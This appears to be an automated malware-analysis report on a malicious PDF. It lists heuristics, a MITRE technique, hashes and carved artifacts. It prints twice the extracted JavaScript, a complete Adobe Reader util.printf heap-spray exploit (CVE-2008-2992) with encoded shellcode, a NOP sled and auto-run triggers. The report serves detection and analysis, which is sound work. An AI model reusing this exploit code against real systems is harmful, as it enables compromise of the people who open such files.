MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 Command and Scripting Interpreter: PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as evidenced by the PDF_UNESCAPE firing and the 'Script obfuscation indicators' signal in the static triage. The primary IOC is the extracted JavaScript file itself. The exact intent of the script is unclear due to obfuscation, but it is likely designed to execute malicious code or exploit a PDF reader vulnerability.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 7
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Adobe Reader JavaScript heap-spray exploit (known CVE family) critical PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILYPDF JavaScript combines heap-spray staging (NOP-sled / shellcode nybble sled or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink util.printf, associated with CVE-2008-2992. Benign documents never pair heap-spray with these long-removed APIs. The exact malformed argument is assembled at run time, so this attributes the exploit to a known pre-2011 Reader CVE family rather than the exact primitive.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
function exploit() { var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4eff%uae54%u225f%ua476%u957e%uad35%ub721%uad35%uab21%u1532%ua63d%uad35%u5121%u4740%u9091%uad35%u7521%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970% … blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc; -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0009_000.js |
pdf-javascript-stream | PDF /JS object 9 at offset 0x2EE | 1794 bytes |
SHA-256: 065da6f8643d44e8d4dc791d2c2935c74a3948d7f7f55dbbdc2d8b7866f71c32 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function repeat(count,what) {
var v = "";
while (--count >= 0) v += what;
return v;
}
function exploit() {
var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4eff%uae54%u225f%ua476%u957e%uad35%ub721%uad35%uab21%u1532%ua63d%uad35%u5121%u4740%u9091%uad35%u7521%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970%u9b8d%ua8a9%u0a78%u5251%u0672%u4913%u046f%u28e5%uf43d%u1339%u1068%ue54a%u5835%ue849%uc842%uf15c%ud88d%u70f0%ub473%u7091%ua043%ueecf%ud88d%u7218%u1443%u2570%u2d3f%u73a4%ua651%ucdd0%u9787%ue4e4%u8486%u68e9%ubc2f%ue420%u2dd3%ua435%ub239%u5513%u07eb%ue4e4%u2402%u6339%uf3f1%uf9e2%u4128%u92e4%u5147%u92b5%u36f4%ufeee%u648d%u4d1b%ub9dd%u3e8f%ue9f5%u437c%u9278%ua1b4%u36f4%ubd50%u48cd%u2704%u6536%u3e90%u6548%u2761%u65cd%u3e90%uda5e%uaf04%u952f%u71bf%u9b25%u70be%u962a%u70be%u972a%u73be%u9529%u6ef6%u9529%ua3f6%uca5b%u3ff6%u65f5%u9041");
blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
bigblock = unescape("%u9090%u9090");
headersize = 20;
wap = headersize+blah.length
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<1400;i++) mm[i] = block + blah;
var s = util.printf("%2147483647.2147483647f",0);
return s;
}
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exploit()",1200);
else
this.setAction("WillClose","exploit()");
|
|||
javascript_obj0009_000_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0x2EE | 336 bytes |
SHA-256: ffb69cb5fe3fa1f4d571eff8ee2eb20f1e51819bd6b99eca819d2a55915cde83 |
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery percent-decode from JavaScript object 9 at offset 0x2EE | 1792 bytes |
SHA-256: abaa42071664166f63acd1fbb2a37fd0b97204314e78cf3c5ccf6a9b797ae3ec |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function repeat(count,what) {
var v = "";
while (--count >= 0) v += what;
return v;
}
function exploit() {
var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4eff%uae54%u225f%ua476%u957e%uad35%ub721%uad35%uab21%u1532%ua63d%uad35%u5121%u4740%u9091%uad35%u7521%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970%u9b8d%ua8a9%u0a78%u5251%u0672%u4913%u046f%u28e5%uf43d%u1339%u1068%ue54a%u5835%ue849%uc842%uf15c%ud88d%u70f0%ub473%u7091%ua043%ueecf%ud88d%u7218%u1443%u2570%u2d3f%u73a4%ua651%ucdd0%u9787%ue4e4%u8486%u68e9%ubc2f%ue420%u2dd3%ua435%ub239%u5513%u07eb%ue4e4%u2402%u6339%uf3f1%uf9e2%u4128%u92e4%u5147%u92b5%u36f4%ufeee%u648d%u4d1b%ub9dd%u3e8f%ue9f5%u437c%u9278%ua1b4%u36f4%ubd50%u48cd%u2704%u6536%u3e90%u6548%u2761%u65cd%u3e90%uda5e%uaf04%u952f%u71bf%u9b25%u70be%u962a%u70be%u972a%u73be%u9529%u6ef6%u9529%ua3f6%uca5b%u3ff6%u65f5%u9041");
blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
bigblock = unescape("%u9090%u9090");
headersize = 20;
wap = headersize+blah.length
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<1400;i++) mm[i] = block + blah;
var s = util.printf("!47483647.2147483647f",0);
return s;
}
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exploit()",1200);
else
this.setAction("WillClose","exploit()");
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.